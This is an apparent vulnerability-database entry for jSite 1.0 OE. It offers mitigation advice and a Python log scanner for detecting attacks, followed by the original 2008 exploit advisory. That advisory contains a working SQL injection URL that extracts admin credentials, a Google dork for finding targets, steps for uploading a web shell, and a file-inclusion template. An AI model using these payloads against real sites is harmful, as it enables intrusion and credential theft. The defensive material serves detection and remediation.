Vendor: jSite 1.0 OE
By: S.W.A.T.
CVSS: 9.3 (HIGH)
Type: SQL Injection & Local File Inclusion
CWE: 89 (SQL Injection) & 98 (Local File Inclusion)
Product Name: jSite 1.0 OE
Affected Version From: 1.0 OE
Affected Version To: 1.0 OE
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

jSite 1.0 OE Multiple Remote SQL/LFI Vulnerability

jSite 1.0 OE contains two input-handling flaws: a SQL injection and a Local File Inclusion. Both are reached by sending a specially crafted HTTP request to the application, the SQL injection through the `page` parameter and the file inclusion through the `module` parameter of `index.php`. The SQL injection can give an attacker access to sensitive information such as usernames and passwords (stored as MD5 hashes, per the advisory below). An attacker who then logs in to the admin panel with recovered credentials can upload malicious files to the server.

Mitigation:

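No patch exists for this version, so the fixes have to be made in the application code. Ensure that user input is validated before it is used in SQL queries, and pass it to the database only through parameterized statements rather than by building the query string from it. For the Local File Inclusion, do not build an include path from request input; map the parameter to a fixed allowlist of files.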
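Until the code is fixed, requests that abuse the two parameters can be found in web server logs. The following is an added example, not code from jSite or from the advisory: a Python check over constructed access-log lines that flags `page` and `module` values failing strict validation. It assumes legitimate `page` values are non-negative integers and legitimate `module` values are plain names; the same two rules can serve as the server-side input validation.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate `page` values are non-negative integers and legitimate
# `module` values are short names made of letters, digits, "_" or "-".
PAGE_OK = re.compile(r"[0-9]{1,9}")
MODULE_OK = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_url(url):
    """Return a list of (parameter, reason) findings for one request URL."""
    findings = []
    # parse_qs percent-decodes values, so encoded separators are seen decoded.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for value in query.get("page", []):
        if not PAGE_OK.fullmatch(value):
            findings.append(("page", "non-numeric value sent to the SQL-backed parameter"))
    for value in query.get("module", []):
        if not MODULE_OK.fullmatch(value):
            findings.append(("module", "value is not a plain module name"))
    return findings

def scan_log(lines):
    """Yield (line_number, client_ip, parameter, reason) for flagged requests."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for parameter, reason in check_url(match.group(1)):
            yield number, client, parameter, reason

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Jul/2008:10:00:01 +0000] "GET /?page=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Jul/2008:10:00:05 +0000] "GET /?page=-1/**/union/**/select/**/1 HTTP/1.1" 200 734',
    '198.51.100.7 - - [12/Jul/2008:10:00:09 +0000] "GET /Script/index.php?module=news HTTP/1.1" 200 2048',
    '203.0.113.9 - - [12/Jul/2008:10:00:12 +0000] "GET /Script/index.php?module=..%2Fconfig HTTP/1.1" 200 911',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Any hit followed by a successful login to `/admin/` or a new `.php` file under `/uploads/` from the same client deserves incident-response attention.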

Exploit-DB raw data:

--==+================================================================================+==--
--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerability                +==--
--==+================================================================================+==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:
You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:
www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back :D ;)

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully
From This Link: www.site.com/admin/index.php?menu=uploads
& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

 www.[target].com/Script/index.php?module=[LFI]


--==+================================================================================+==--
--==+              jSite 1.0 OE Multiple Remote SQL/LFI Vulnerability                +==--
--==+================================================================================+==--

# milw0rm.com [2008-07-12]